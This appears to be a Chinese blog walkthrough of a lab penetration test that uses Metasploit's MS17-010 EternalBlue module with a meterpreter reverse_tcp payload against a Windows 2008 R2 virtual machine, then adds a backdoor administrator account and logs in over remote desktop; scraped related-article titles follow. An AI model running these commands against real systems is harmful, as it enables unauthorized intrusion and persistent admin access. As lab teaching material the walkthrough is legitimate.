渗透测试:metasploit+ms-17-010+Windows2008r2
渗透测试:metasploit+ms-17-010+Windows2008r2
工具
1 vbox
2 kali
3 win2008r2
最终效果
创建一个属于Administrators组的用户admin,并使用admin账户进入系统。
实现步骤
1 使用netdiscover 探测局域网内的主机,目的是发现需要渗透的主机
现在我们发现了3台主机。
2 使用nmap进行扫描
nmap基本功能有三个
(1)是扫描主机端口,嗅探所提供的网络服务
(2)是探测一组主机是否在线
(3)还可以推断主机所用的操作系统,到达主机经过的路由,系统已开放端口的软件版本
nmap 扫描连续的IP地址的方法是使用“-”将主机位的第一位和最后一位接起来。
这里我们可以看到192.168.1.4这台主机开放了3389端口,3389端口是一个远程桌面的服务端口,如果连接上了,输入系统管理员的用户名和密码后,将变得可以像操作本机一样操作远程的电脑,因此远程服务器一般都将这个端口修改数值或者关闭。
这个功能在后续的环节有用。
3 测试环境
攻击机:kali
ip:192.168.1.5
靶机:win2008r2
ip:192.168.1.4
4 使用metasploit的ms-17-010 payload
1 metasploit 主界面
2 搜索ms17_010
search ms17_010
选择第3 个
# 3
name : exploit/windows/smb/ms17_010_eternalblue
disclosure date : 2017-03-14
rank : average
check : No
description : MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 调用模块 exploit/windows/smb/ms17_010_eternalblue及配置payload
use exploit/windows/smb/ms17_010_eternalblue
查看模块需要设置的
show options
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.1.5
rhosts => 192.168.1.5
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
设置目标IP地址及选择payload,查看payload要求
payload 要求设置监听主机,这里写本地kali的ip地址
set lhost 192.168.1.4
最后再查看一下设置
show options
4 开始攻击
exploit
发现是因为把本地kali ip与 远程win2008的ip弄混了
重新设置一下
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.5
lhost => 192.168.1.5
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.1.4
rhost => 192.168.1.4
再次进行攻击
####5 进shell提权
shell
添加用户并将用户加入管理组
然后使用windos cmd命令进行创建用户并加入管理员组
net user qwer asdf123! /add
注意密码要符合复杂性要求
net local group Administrators qwer /add
把admin用户加入本地管理员组
6 远程桌面连接登录
这里之前的3389端口可以用到了
使用创建的qwer用户进行登录
登录成功
渗透测试:metasploit+ms-17-010+Windows2008r2相关推荐
- Kali 渗透测试—Metasploit
Metasploit 并不仅仅是一个工具软件,它是为自动化实施经典的.常规的,或复杂新颖的攻击提供基础设施支持的一个完整框架平台. Metasploit 中提供了渗透攻击模块.攻击载荷和编码器来轻易实 ...
- 渗透测试Metasploit框架体验(5.理解MSF后渗透-之提权)
1.目标机器权限提升 权限提升(privilege escalation) : 攻击者通过安全漏洞把获取到的受限制的低权限用户突破限制,提权至高权限的管理员用户,从而获得对整个系统得控制权.Windo ...
- 渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)
MsfVenom 首先msf就是Metaaploit,venom就是病毒.msfvenom是msfpayload和msfencode的组合.将这两个工具集成在一个框架实例中.进一步来说,msfveno ...
- 安服/渗透测试面试问题总结
文章目录 HR面 问题 对我们公司有什么了解,为什么选择本公司 为什么想要应聘这个职位 对安全服务是怎么理解的 如果我不知道渗透测试,两分钟说一下 如果我是一个汽车厂商,你如何证明你的工作是有意义的? ...
- 渗透测试以及安全面试的经验之谈-技术篇
技术面试问题 CTF 说一个印象深刻的CTF的题目 Padding Oracle->CBC->密码学(RSA/AES/DSA/SM) CRC32 反序列化漏洞 sql二次注入 第一次进行数 ...
- 渗透测试的8个步骤—转载
渗透测试的8个步骤 展现一次完整的渗透测试过程及思路 发布时间:2017年10月25日 15:11 浏览量:1104 渗透测试这个事情不是随便拿个工具就可以做了, 要了解业务还需要给出解决方案 ...
- 获取Windows系统密码凭证 (゚益゚メ) 渗透测试
文章目录 Windows 加密简介 Windows 哈希过程 Windows 凭证获取 使用powershell脚本 Pwddump7 使用猕猴桃(mimikatz) 常用命令 本地非交互式凭证获取 ...
- 渗透测试的8个步骤 展现一次完整的渗透测试过程及思路
渗透测试这个事情不是随便拿个工具就可以做了, 要了解业务还需要给出解决方案 .之前安全加介绍了金融行业 实战微信银行渗透测试, 运营商 渗透测试实战 ,今天让我们来说说 渗透测试 的流程及渗透测试相关 ...
- metasploit 一款开源的渗透测试框架
渗透神器漏洞利用框架metasploit from: https://zhuanlan.zhihu.com/p/30743401 metasploit是一款开源的渗透测试框架软件也是一个逐步发展与成熟 ...
- 《Metasploit渗透测试魔鬼训练营》学习笔记
Metasploit渗透测试魔鬼训练营学习笔记 法律常识 <中华人民共和国网络安全法>已由中华人民共和国第十二届全国人民代表大会常务委员会第二十四次会议于2016年11月7日通过,现予公布 ...
最新文章
- 1. golang 语言环境安装
- Android 编译报错:Could not get resource
- 笔记本高分屏字体模糊_高色域+高分辨率轻薄本推荐,你需要2K屏笔记本电脑么?...
- 那些做的“不够好”的父母,他们可能已经做到了自己的100分
- 项目中使用RDLC报表
- 第6章 面向对象(下)
- git 只commit不push 会有影响吗_规范化团队 git 提交信息
- Partition学习笔记
- ts语音自建服务器,自建TeamSpeak语音服务器,免费提供给专注游戏的玩家使用!...
- 3详细参数_大疆精灵3值得入手吗?最详细的实测体验,各种参数应有尽有!
- c语言实验转换字母顺序结构,实验1顺序结构的程序设计-实验报告.doc
- python从入门到实践答案第四章_python从入门到实践课后习题第四章
- MyEclipse 2017 CI 10 发布(附下载)
- ShuttleFlow 2.0版本跨链协议上线,同时支持OKExChain、Heco及BSC双向互操作
- android 多语言(在APP里面内切换语言)
- Spring MVC中@ControllerAdvice注解实现全局异常拦截
- RTT设置删除空闲钩子函数想到函数指针和回调函数
- 听说现在流行搬电脑回家?云桌面救星来了
- 菠萝派php示例,简易菠萝派 - 美食杰 - 美食,菜谱 - 中国最全的家常菜谱美食网...
- ChatGPT所有插件详细教程